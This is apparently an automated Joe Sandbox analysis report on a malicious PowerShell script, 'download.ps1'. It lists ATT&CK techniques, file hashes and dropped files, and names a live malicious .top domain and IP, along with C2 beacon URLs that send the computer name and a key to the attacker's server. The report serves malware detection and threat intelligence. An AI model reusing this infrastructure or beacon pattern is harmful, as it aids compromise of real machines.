Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps13%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://jjdgdeffjimfgne.top100%Avira URL Cloudmalware
https://apis.google.comh0%Avira URL Cloudsafe
http://$kunxogyfrzhm872/$7pqtrusyc96w32k2ptekhb6ufiod0.php?id=$env:computername&key=$ktyawmgsh&s=5270%Avira URL Cloudsafe
http://www.google.comPa0%Avira URL Cloudsafe
http://crl.micrH0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
jjdgdeffjimfgne.top
45.61.136.138
truetrue
    unknown
    www.google.com
    172.217.1.100
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/false
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://www.google.com/intl/en/about/products?tab=whpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.15458164282.000001A3DC568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EBA9A000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://jjdgdeffjimfgne.toppowershell.exe, 00000000.00000002.15458164282.000001A3DC38A000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://schema.org/WebPagepowershell.exe, 00000000.00000002.15458164282.000001A3DD1C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD185000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DD1E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DCEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EBA9A000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://apis.google.comhpowershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contoso.com/powershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.google.compowershell.exe, 00000000.00000002.15458164282.000001A3DC553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/Pester/PesterXzpowershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://apis.google.compowershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EBA9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.15486330108.000001A3F37CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.15458164282.000001A3DB761000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.google.comPapowershell.exe, 00000000.00000002.15458164282.000001A3DC553000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://crl.micrHpowershell.exe, 00000000.00000002.15489452320.000001A3F3C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15458164282.000001A3DC568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.15479484532.000001A3EBA9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contoso.com/Iconpowershell.exe, 00000000.00000002.15479484532.000001A3EB7D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.google.com/preferences?hl=enpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schema.org/WebPageXzpowershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://$kunxogyfrzhm872/$7pqtrusyc96w32k2ptekhb6ufiod0.php?id=$env:computername&key=$ktyawmgsh&s=527powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.15479484532.000001A3EBA9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s24hpowershell.exe, 00000000.00000002.15458164282.000001A3DC583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.quovadis.bm0powershell.exe, 00000000.00000002.15486330108.000001A3F37CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.15458164282.000001A3DCA00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.15458164282.000001A3DB761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000000.00000002.15458164282.000001A3DB98A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  45.61.136.138
                                                                                                  jjdgdeffjimfgne.topUnited States
                                                                                                  40676AS40676UStrue
                                                                                                  172.217.1.100
                                                                                                  www.google.comUnited States
                                                                                                  15169GOOGLEUSfalse
                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1585431
                                                                                                  Start date and time:2025-01-07 16:43:48 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 5m 34s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                  Run name:Suspected VM Detection
                                                                                                  Number of analysed new started processes analysed:4
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:download.ps1
                                                                                                  Detection:MAL
                                                                                                  Classification:mal72.evad.winPS1@2/7@2/2
                                                                                                  EGA Information:Failed
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  • Number of executed functions: 12
                                                                                                  • Number of non-executed functions: 1
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .ps1
                                                                                                  • Stop behavior analysis, all processes terminated
                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                                                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7384 because it is empty
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: download.ps1
                                                                                                  TimeTypeDescription
                                                                                                  10:45:59API Interceptor26x Sleep call for process: powershell.exe modified
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • jjdgdeffjimfgne.top/x31t20p8dnhtr.php?id=computer&key=63331330340&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • jjdgdeffjimfgne.top/4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • bfhdkgmmhdbikgj.top/3dy4fnsuzmhtr.php?id=computer&key=40391840945&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • bfhdkgmmhdbikgj.top/f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • bfhdkgmmhdbikgj.top/gz782b5rhjhtr.php?id=computer&key=73964595488&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • bfhdkgmmhdbikgj.top/8j3zac462bhtr.php?id=user-PC&key=66957681081&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/sgat4cebpihtr.php?id=computer&key=24472055606&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/g6n2wfvsr0htr.php?id=user-PC&key=95416299579&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/m15teydqhphtr.php?id=computer&key=27186586974&s=527
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  jjdgdeffjimfgne.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  miori.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 206.201.59.150
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  LZUCldA1ro.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 207.231.107.137
                                                                                                  LZUCldA1ro.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 207.231.107.137
                                                                                                  No context
                                                                                                  No context
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:@...e...........................................................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6222
                                                                                                  Entropy (8bit):3.7545832928184226
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:gzUNC7GNk2kvhkvCCtcDjeORp7HPDjeORi7HA:gzi9gjesZjesd
                                                                                                  MD5:E3FC9506CAF3B313E33EC6463FABDA5E
                                                                                                  SHA1:A58F67B4730268D404FA8577E541D59BBA9F8BE3
                                                                                                  SHA-256:76E90D4A261A072AA72891EB654A6B58CC4AF4994DB05647BC0670C405AF2C71
                                                                                                  SHA-512:A8A2FDA238C2DF88BCE6F1F30C400E9948E1205FB787DC2A78B61EBEE03C58F531D0EE623D77B88005329209343D6678FB64062CA17ECA12F5FAD286EB58E318
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.".. ...;.}.S......>.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S....dp8.a.....>.a......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.'Z.}....B......................A!.A.p.p.D.a.t.a...B.V.1.....'Z.}..Roaming.@......"S.'Z.}....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.'Z.}....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....'Z.M..Windows.@......"S.'Z.M....F.....................6...W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`'Z.K....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`'Z.K....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.'Z.J....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.'Z.}....i...........
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6222
                                                                                                  Entropy (8bit):3.7545832928184226
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:gzUNC7GNk2kvhkvCCtcDjeORp7HPDjeORi7HA:gzi9gjesZjesd
                                                                                                  MD5:E3FC9506CAF3B313E33EC6463FABDA5E
                                                                                                  SHA1:A58F67B4730268D404FA8577E541D59BBA9F8BE3
                                                                                                  SHA-256:76E90D4A261A072AA72891EB654A6B58CC4AF4994DB05647BC0670C405AF2C71
                                                                                                  SHA-512:A8A2FDA238C2DF88BCE6F1F30C400E9948E1205FB787DC2A78B61EBEE03C58F531D0EE623D77B88005329209343D6678FB64062CA17ECA12F5FAD286EB58E318
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.".. ...;.}.S......>.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S....dp8.a.....>.a......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.'Z.}....B......................A!.A.p.p.D.a.t.a...B.V.1.....'Z.}..Roaming.@......"S.'Z.}....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.'Z.}....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....'Z.M..Windows.@......"S.'Z.M....F.....................6...W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`'Z.K....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`'Z.K....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.'Z.J....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.'Z.}....i...........
                                                                                                  File type:ASCII text, with very long lines (10571), with CRLF line terminators
                                                                                                  Entropy (8bit):5.96025283678741
                                                                                                  TrID:
                                                                                                    File name:download.ps1
                                                                                                    File size:20'277 bytes
                                                                                                    MD5:09a972869de8f5ccaa725f74ed664eb1
                                                                                                    SHA1:4c5c96057bbb64b6fec356875e8054ab5cf87bb9
                                                                                                    SHA256:153b7fdc3db3b4bfb6cbe37338c7c3c1393755c0b67c896149538ca6f8032839
                                                                                                    SHA512:ead0b756c15f803c441c2a55a41fc269b404749a59bfbe76df1f78d24661042258ce149021a074520aa938b6242e94b052b01b514976e1a306df7ce35a9198c9
